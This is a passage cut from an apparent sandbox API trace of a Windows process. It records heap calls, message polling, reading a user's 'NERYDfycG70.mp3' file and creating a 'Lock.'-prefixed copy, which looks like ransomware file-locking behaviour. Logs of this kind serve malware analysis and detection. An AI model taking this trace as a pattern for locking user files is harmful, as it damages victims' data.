lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.189] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NERYDfycG70.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nerydfycg70.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0149.189] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.189] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0149.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0149.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0149.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0149.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.190] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0149.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0149.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0149.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0149.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0149.191] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.NERYDfycG70.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.nerydfycg70.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0149.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0149.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0149.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0149.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0149.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0149.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cde020 [0149.195] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0149.195] ReadFile (in: hFile=0x4fc, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x44c4, lpOverlapped=0x0) returned 1 [0149.197] ReadFile (in: hFile=0x4fc, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0149.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44c4) returned 0x2a9a140 [0149.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cde020 | out: hHeap=0x2af0000) returned 1 [0149.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44c4) returned 0x2a9e610 [0149.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0149.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.200] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44c4) returned 0x2a9a140 [0149.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0149.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.201] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0149.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0149.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0149.204] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0149.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0149.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0149.205] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0149.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0149.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44c4) returned 0x2a9a140 [0149.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0149.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0149.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa180 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0149.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0149.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0149.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0149.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44c4) returned 0x2aaf410 [0149.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0149.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0149.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0149.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0149.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0149.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0149.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0149.207] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0149.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0149.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0149.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0149.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: 